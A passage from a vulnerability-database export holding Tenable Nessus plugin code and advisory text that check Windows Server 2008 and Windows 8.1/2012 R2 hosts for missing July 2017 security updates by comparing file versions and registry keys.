script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (!defined_func(\"nasl_level\") || nasl_level() < 6000 ) exit(0);\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-07';\n\nkbs = make_list(\n \"4022746\",\n \"4022748\",\n \"4022914\",\n \"4025240\",\n \"4025252\",\n \"4025397\",\n \"4025398\",\n \"4025409\",\n \"4025497\",\n \"4025674\",\n \"4025872\",\n \"4025877\",\n \"4026059\",\n \"4026061\",\n \"4032955\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif (hotfix_check_fversion_init() == HCF_CONNECT) exit(0, \"Unable to create SMB session.\");\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4025872\narch = get_kb_item('SMB/ARCH');\n\nswitch (arch)\n{\n case \"x86\":\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"x86_microsoft-windows-powershell-exe_31bf3856ad364e35_7.1.6002.16398_none_2442a61e294c7c71\", file_pat:\"^powershell\\.exe$\", max_recurse:1);\n break;\n case \"x64\":\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_7.1.6002.16398_none_806141a1e1a9eda7\", file_pat:\"^powershell\\.exe$\", max_recurse:1);\n break;\n default:\n files = \"\";\n}\nif (!empty_or_null(files))\n{\n # Checking before registry key check for session handling.\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"msil_system.management.automation_31bf3856ad364e35\", file_pat:\"^System\\.Management\\.Automation\\.dll$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.2.9200.22198'),\n max_versions:make_list('6.2.9200.99999'),\n bulletin:bulletin,\n kb:\"4025872\", session:the_session);\n}\n\n# CVE-2017-8563 applies to Server 2008 and a\n# registry key is required if the target is\n# a domain controller.\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# Is target a DC?\nret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Control\\ProductOptions\\ProductType\"\n);\n\nif (!isnull(ret) && ret == 'LanmanNT')\n{\n # Target is a DC.\n # Does target have required key for CVE-2017-8563 fix?\n ret = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\\LdapEnforceChannelBinding\"\n );\n if (isnull(ret) || (ret != '1' && ret != '2'))\n {\n vuln++;\n reg_key_note =\n '\\n The registry key \"SYSTEM\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\LdapEnforceChannelBinding\"' +\n '\\n is missing or is not equal to \"1\" or \"2\"' +\n '\\n';\n hotfix_add_report(reg_key_note, bulletin:bulletin);\n }\n}\n\nRegCloseKey(handle:hklm);\nclose_registry(close:FALSE);\n\n# 4022746\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"kerberos.dll\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022746\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"kerberos.dll\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4022746\")\n )\n vuln++;\n\n# 4022748\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netio.sys\", version:\"6.0.6002.19805\", min_version:\"6.0.6000.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022748\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"netio.sys\", version:\"6.0.6002.24125\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022748\")\n)\n vuln++;\n\n# 4022914\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"http.sys\", version:\"6.0.6002.19812\", min_version:\"6.0.6002.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022914\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"http.sys\", version:\"6.0.6002.24132\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4022914\")\n )\n vuln++;\n\n# 4025240\nif(hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msxml3.dll\", version:\"8.100.5015.0\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025240\"))\n vuln++;\n\n# 4025397\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"perfmon.exe\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025397\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"perfmon.exe\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025397\")\n )\n vuln++;\n\n# 4025398\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msinfo32.exe\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025398\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msinfo32.exe\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025398\")\n )\n vuln++;\n\n# 4025409\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wldap32.dll\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025409\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wldap32.dll\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025409\")\n )\n vuln++;\n\n# 4025497\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"browseui.dll\", version:\"6.0.6002.19806\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025497\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"browseui.dll\", version:\"6.0.6002.24126\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025497\")\n )\n vuln++;\n\n# 4025674\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntfs.sys\", version:\"6.0.6002.19816\", min_version:\"6.0.6002.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4025674\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"ntfs.sys\", version:\"6.0.6002.24136\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4025674\")\n )\n vuln++;\n\n# 4025877\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19816\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025877\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24136\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025877\")\n )\n vuln++;\n\n# 4026059\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"clfs.sys\", version:\"6.0.6002.19810\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4026059\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"clfs.sys\", version:\"6.0.6002.24130\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4026059\")\n )\n vuln++;\n\n# 4032955\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"query.dll\", version:\"6.0.6002.19829\", min_version:\"6.0.6002.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4032955\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"query.dll\", version:\"6.0.6002.24149\", min_version:\"6.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4032955\")\n )\n vuln++;\n\n# 4025252\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21029\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.16918\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4025252\")\n)\n vuln++;\n\n# 4026061\nprogram_files = hotfix_get_programfilesdir();\nif(\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wordpad.exe\", version:\"6.0.6002.19812\", min_version:\"6.0.6002.16000\", dir:\"\\windows nt\\accessories\", path:program_files, bulletin:bulletin, kb:\"4026061\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"wordpad.exe\", version:\"6.0.6002.24133\", min_version:\"6.0.6002.20000\", dir:\"\\windows nt\\accessories\", path:program_files, bulletin:bulletin, kb:\"4026061\")\n )\n vuln++;\n\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:44:04", "description": "The remote Windows host is missing security update 4025333\nor cumulative update 4025336. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics Component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8594)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)", "edition": 34, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-11T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 July 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8608", "CVE-2017-8486", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8587", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8606", "CVE-2017-8607", "CVE-2017-8594", "CVE-2017-8565", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8562", "CVE-2017-8495", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8463", "CVE-2017-8590"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUL_4025336.NASL", "href": "https://www.tenable.com/plugins/nessus/101365", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101365);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0170\",\n \"CVE-2017-8463\",\n \"CVE-2017-8467\",\n \"CVE-2017-8486\",\n \"CVE-2017-8495\",\n \"CVE-2017-8556\",\n \"CVE-2017-8557\",\n \"CVE-2017-8561\",\n \"CVE-2017-8562\",\n \"CVE-2017-8563\",\n \"CVE-2017-8564\",\n \"CVE-2017-8565\",\n \"CVE-2017-8573\",\n \"CVE-2017-8577\",\n \"CVE-2017-8578\",\n \"CVE-2017-8580\",\n \"CVE-2017-8581\",\n \"CVE-2017-8582\",\n \"CVE-2017-8587\",\n \"CVE-2017-8588\",\n \"CVE-2017-8589\",\n \"CVE-2017-8590\",\n \"CVE-2017-8592\",\n \"CVE-2017-8594\",\n \"CVE-2017-8602\",\n \"CVE-2017-8606\",\n \"CVE-2017-8607\",\n \"CVE-2017-8608\",\n \"CVE-2017-8618\"\n );\n script_bugtraq_id(\n 99387,\n 99389,\n 99390,\n 99394,\n 99396,\n 99397,\n 99398,\n 99399,\n 99400,\n 99401,\n 99402,\n 99408,\n 99409,\n 99410,\n 99412,\n 99413,\n 99414,\n 99416,\n 99419,\n 99421,\n 99423,\n 99424,\n 99425,\n 99426,\n 99427,\n 99428,\n 99429,\n 99431,\n 99439\n );\n script_xref(name:\"MSKB\", value:\"4025333\");\n script_xref(name:\"MSFT\", value:\"MS17-4025333\");\n script_xref(name:\"MSKB\", value:\"4025336\");\n script_xref(name:\"MSFT\", value:\"MS17-4025336\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 July 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4025333\nor cumulative update 4025336. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Performance Monitor Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to create a\n Data Collector Set and import a specially crafted XML\n file, to disclose arbitrary files via an XML external\n entity (XXE) declaration. (CVE-2017-0170)\n\n - A remote code execution vulnerability exists in Windows\n Explorer due to improper handling of executable files\n and shares during rename operations. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to open a specially crafted file, to execute arbitrary\n code in the context of the current user. (CVE-2017-8463)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8467)\n\n - An information disclosure vulnerability exists in Win32k\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to disclose sensitive information.\n (CVE-2017-8486)\n\n - A security bypass vulnerability exists in Microsoft\n Windows when handling Kerberos ticket exchanges due to a\n failure to prevent tampering with the SNAME field. A\n man-in-the-middle attacker can exploit this to bypass\n the Extended Protection for Authentication security\n feature. (CVE-2017-8495)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8556)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console due to improper\n parsing of XML input that contains a reference to an\n external entity. An unauthenticated, remote attacker\n can exploit this, by convincing a user to open a\n specially crafted file, to disclose arbitrary files via\n an XML external entity (XXE) declaration.\n (CVE-2017-8557)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-8561)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of calls to Advanced\n Local Procedure Call (ALPC). An authenticated, remote\n attacker can exploit this via a specially crafted\n application, to run processes in an elevated context.\n (CVE-2017-8562)\n\n - An elevation of privilege vulnerability exists in\n Windows due to Kerberos falling back to NT LAN Manager\n (NTLM) Authentication Protocol as the default\n authentication protocol. An authenticated, remote\n attacker can exploit this, via an application that\n sends specially crafted traffic to a domain controller,\n to run processes in an elevated context. (CVE-2017-8563)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to bypass\n Kernel Address Space Layout Randomization (KASLR) and\n disclose the base address of the kernel driver.\n (CVE-2017-8564)\n\n - A remote code execution vulnerability exists in\n PowerShell when handling a PSObject that wraps a CIM\n instance. An authenticated, remote attacker can exploit\n this, via a specially crafted script, to execute\n arbitrary code in a PowerShell remote session.\n (CVE-2017-8565)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Graphics component due to improper handling\n of objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-8573)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Microsoft Graphics Component due to improper\n handling of objects in memory. A local attacker can\n exploit these, via a specially crafted application, to\n run arbitrary code in kernel mode. (CVE-2017-8577,\n CVE-2017-8578, CVE-2017-8580)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper handling of objects in memory. A\n local attacker can exploit this, via a specially crafted\n application, to run arbitrary code in kernel mode.\n (CVE-2017-8581)\n\n - An information disclosure vulnerability exists in the\n HTTP.sys server application component due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to disclose sensitive information.\n (CVE-2017-8582)\n\n - A denial of service vulnerability exists in Windows\n Explorer that is triggered when Explorer attempts to\n open a non-existent file. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause a user's system to\n stop responding. (CVE-2017-8587)\n\n - A remote code execution vulnerability exists in WordPad\n due to improper parsing of specially crafted files. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted file, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-8588)\n\n - A remote code execution vulnerability exists in the\n Windows Search component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by sending specially crafted messages\n to the Windows Search service, to elevate privileges and\n execute arbitrary code. (CVE-2017-8589)\n\n - An elevation of privilege vulnerability exists in the\n Windows Common Log File System (CLFS) driver due to\n improper handling of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to run processes in an elevated context. (CVE-2017-8590)\n\n - A security bypass vulnerability exists in Microsoft\n browsers due to improper handling of redirect requests.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to bypass CORS redirect restrictions. (CVE-2017-8592)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8594)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper parsing of HTTP content. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to\n redirect the user to a malicious website.\n (CVE-2017-8602)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8606)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8607)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8608)\n\n - A remote code execution vulnerability exists in Internet\n Explorer in the VBScript engine due to improper handling\n of objects in memory. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to execute arbitrary code\n in the context of the current user. (CVE-2017-8618)\");\n # https://support.microsoft.com/en-us/help/4025336/windows-8-update-kb4025336\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60b27ab9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4025333 or Cumulative update KB4025336.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-07';\nkbs = make_list(\n '4025333', # 8.1 / 2012 R2 Security Only\n '4025336' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, 